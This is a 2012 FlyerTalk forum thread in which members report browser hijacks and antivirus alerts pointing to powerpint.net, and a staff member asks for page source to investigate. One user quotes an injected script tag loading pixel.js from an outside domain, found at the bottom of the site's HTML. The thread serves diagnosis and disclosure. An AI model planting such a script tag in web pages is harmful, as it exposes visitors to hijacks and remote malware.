Malicious calls to powerpint.net on FT [Merged threads]
Feb 22, 2012 | 1:18 am
#61
Join Date: May 2004
Location: Home
Programs: AA, Delta, UA & thanks to FTers for my PC Gold!
Posts: 7,674
Powerpint.net hijack browser again!
Two things I've noticed:
1). FT has been slowing down my browsing speed since I returned home after Chinese New Year. <snip>
2). ...
2c). I refreshed TB Topics Forum when I returned to the TB Forum tab.
Guess where FT took me? Here: http://spi.domainsponsor.com/lander.shtml?powerpint.net
Didn't realize powerpint.net can hijack my browsing page to a total spam site.
1). FT has been slowing down my browsing speed since I returned home after Chinese New Year. <snip>
2). ...
2c). I refreshed TB Topics Forum when I returned to the TB Forum tab.
Guess where FT took me? Here: http://spi.domainsponsor.com/lander.shtml?powerpint.net
Didn't realize powerpint.net can hijack my browsing page to a total spam site.
http://spi.domainsponsor.com/lander.shtml?powerpint.net
This is too ridiculous that I just dropped FT as my FF homepage.
Just got the powerprint.net redirect when going to the UA Crew Base thread.
http://spi.domainsponsor.com/lander.shtml?powerpint.net
Come on, IB?!
http://spi.domainsponsor.com/lander.shtml?powerpint.net
Come on, IB?!
Last edited by lin821; Feb 23, 2012 at 1:26 am Reason: adding one quote
Feb 23, 2012 | 12:42 pm
#64
Join Date: Apr 2007
Location: PHX
Programs: AA EXP & 1MM (Lifetime Gold); Marriott Gold; National Exec Emerald's
Posts: 337
Anyone else getting TREND MICRO OfficeScan complaining about attempts to hit http://powerpint.net/in.cgi?2 every time you load an FT page.
Feb 23, 2012 | 5:16 pm
#65
No longer with Internet Brands
Join Date: Mar 2011
Location: Los Angeles, CA
Programs: DL DM 1.6MM, Marriott LT Plat
Posts: 5,343
Merged threads and new information needed please
Hi all,
I've merged these threads together so everyone can get the same messaging on this. It will make for confused reading if you try to go back and read chronologically, but what's more important is what happens going forward.
First, thank you for reporting and monitoring this issue with us. Without your data, there's no way we could track this issue. I know it's been frustrating and we've been watching this on a daily basis.
Thus far, we have been unable to find any trace of anything malicious on FT. We've looked hard and it's come up clean. So we need some additional data.
If you could, *email* me the URL (from your browser window) of the page you're on when you see the error/warning message.
IMPORTANTLY, also include the source code from the page; you do this by clicking CTRL+U (or right click and "view page source") and copy and paste it into an email to me.
My address is paul.obrien at internetbrands.com.
Thank you folks. We'll figure out what's up.
Paul
I've merged these threads together so everyone can get the same messaging on this. It will make for confused reading if you try to go back and read chronologically, but what's more important is what happens going forward.
First, thank you for reporting and monitoring this issue with us. Without your data, there's no way we could track this issue. I know it's been frustrating and we've been watching this on a daily basis.
Thus far, we have been unable to find any trace of anything malicious on FT. We've looked hard and it's come up clean. So we need some additional data.
If you could, *email* me the URL (from your browser window) of the page you're on when you see the error/warning message.
IMPORTANTLY, also include the source code from the page; you do this by clicking CTRL+U (or right click and "view page source") and copy and paste it into an email to me.
My address is paul.obrien at internetbrands.com.
Thank you folks. We'll figure out what's up.
Paul
Feb 23, 2012 | 6:38 pm
#66
Join Date: Dec 2004
Location: SEA
Posts: 1,887
I can get it to manifest for any thread by clicking on Thread Tools, Show Printable Version...
I looked at the HTML source and this is what it shows at the bottom. Clearly something being served by the FT servers, NOT from an advertisement (or it would not show up in the HTML).
I looked at the HTML source and this is what it shows at the bottom. Clearly something being served by the FT servers, NOT from an advertisement (or it would not show up in the HTML).
Code:
<p class="smallfont" align="center"> <br /> <script src="http://simbeppc.com/jscript/pixel.js"></script> </p> <br /><div style="z-index:3" class="smallfont" align="center">SEO by vBSEO 3.6.0 ©2011, Crawlability, Inc.</div> </body> </html>
Feb 24, 2012 | 9:01 pm
#68
A FlyerTalk Posting Legend
Join Date: Sep 2006
Location: where the chile is hot
Programs: AA,RR,NW,Delta ,UA,CO
Posts: 49,066
Firefox browser, just did the latest update today (finally) and now I'm getting the same problem with every FT pageload. Not happening on any other sites.
(edited to add) Just now when I posted this post, power.pint briefly came up before the post posted.
(edited to add) Just now when I posted this post, power.pint briefly came up before the post posted.
Feb 25, 2012 | 7:45 am
#69
Join Date: May 2004
Location: Home
Programs: AA, Delta, UA & thanks to FTers for my PC Gold!
Posts: 7,674
FF Browser got hijacked by powerpint.net again when visiting between fora 4 minutes ago:
1. Clicking Travel&Dining: Destination >> The World
2. Clicking Asia Forum.
3. Instead of landing in Asia, this is what I got:
http://spi.domainsponsor.com/lander.shtml?powerpint.net
1. Clicking Travel&Dining: Destination >> The World
2. Clicking Asia Forum.
3. Instead of landing in Asia, this is what I got:
http://spi.domainsponsor.com/lander.shtml?powerpint.net
Feb 28, 2012 | 11:10 pm
#71
Join Date: Feb 2004
Location: DFW
Programs: AA ExPlat, Marriott Titanium, IHG Diamond
Posts: 3,261
Mar 1, 2012 | 12:02 am
#75
Moderator, El Al and Marriott Bonvoy, FlyerTalk Evangelist
Join Date: Feb 2005
Location: SIN
Programs: SQ PPS, Mar LTT, Hyatt LTG, AA LTG, LY, HH, IC, BA, DL, UA SLV
Posts: 12,155
Was fine a few hours ago at home. Now in the lounge at SIN and I'm getting it on every single FT page load but no other website.